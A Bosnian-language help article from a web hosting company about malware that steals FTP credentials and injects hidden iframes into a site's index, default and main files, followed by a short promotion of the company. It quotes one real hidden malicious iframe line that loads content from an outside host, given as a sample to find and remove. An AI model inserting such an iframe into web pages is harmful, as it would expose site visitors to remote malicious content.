MALWARE - RUšI STRANICE

Malware je opasan virus koji vam može nanijeti puno glavobolje. Pogotovo ako nemate BackUp.

Ova vrsta "Malware" koja nas prvenstveno zanima djeluje tako što kao trojanac uđe u kompjuter i webMasteru jednostavno pokupi sve kodove i korisnička imena vezana za domenu koja se nalaze u FTP programu i aktivira virus na svim tim stranicama.

Može napraviti jako dosta štete, napada u glavnom filove u kojima se nalazi riječ index, default i main. U tim filovima ubacuje svoje kodove koji počinju sa <iframe ....

Na nekim mjestima može obrisati i pola koda, tako da ako nemate backup-a možete samo plakati ako je u pitanju PHP ili ASP kodiranje.

Preventiva je da kodove i FTP program držite odvojeno. Da vam kodovi sadrže velika i mala slova, brojeve i simbole. Može vam kod izgledati ovakav k*h<BDk79=K< .

Ako vam se ipak desi ovako nešto onda reagujte brzo.

Kao prvo skanirajte svoj PC nekim od antivirus programa npr. Avast

Promijenite password u FTP-u i ako imate BackUp stranice obrišite sve sa stranice i uploadujte cijelu stranicu ponovo.

Ako nemate BackUp onda pretražite sve stranice od datuma par dana prije nego što vas je virus napao.

Tražite filove koji imaju u sebi index, default i main, otvorite i pokušajte očistiti kodove koji počinju sa <iframe ...

ili izgleda ovako:

<iframe src="http://mischamikolasek.dynalias.org:8080/ts/in.cgi?open7" width=281 height=0 style="visibility: hidden"></iframe>

Nadam se da će vam ovo bar malo pomoći :-)

MISIJA: NAJBOLJI HOSTING U BIH

Naš najveći cilj je povjerenje naših klijenata, a povjerenje se stiče samo profesionalnim odnosnom prema radu i iskrenošću.

Mi brinemo o našem klijentu i s toga ćemo uvjek gledati da riješimo problem do kraja ili da ponudimo alternativno rješenja.  

 

KOJE VAM USLUGE MOŽEMO PRUŽITI...?

WebHosting, WebStranica, Domene, Dizajneri, Wordpress, Joomla, Email, Drupal, Magento, Servis, Hosting, Webshop

Podrška

Uvijek smo spremni da vam pružimo podršku vezano za namaše usluge.
U tu svrhu su Vam na raspolaganju: Live Chat Support, telefon: 032 94 11 00, fax: 032 44 20 21, i naši e-mailovi; prodaja@bobihost.com i support@bobihost.com.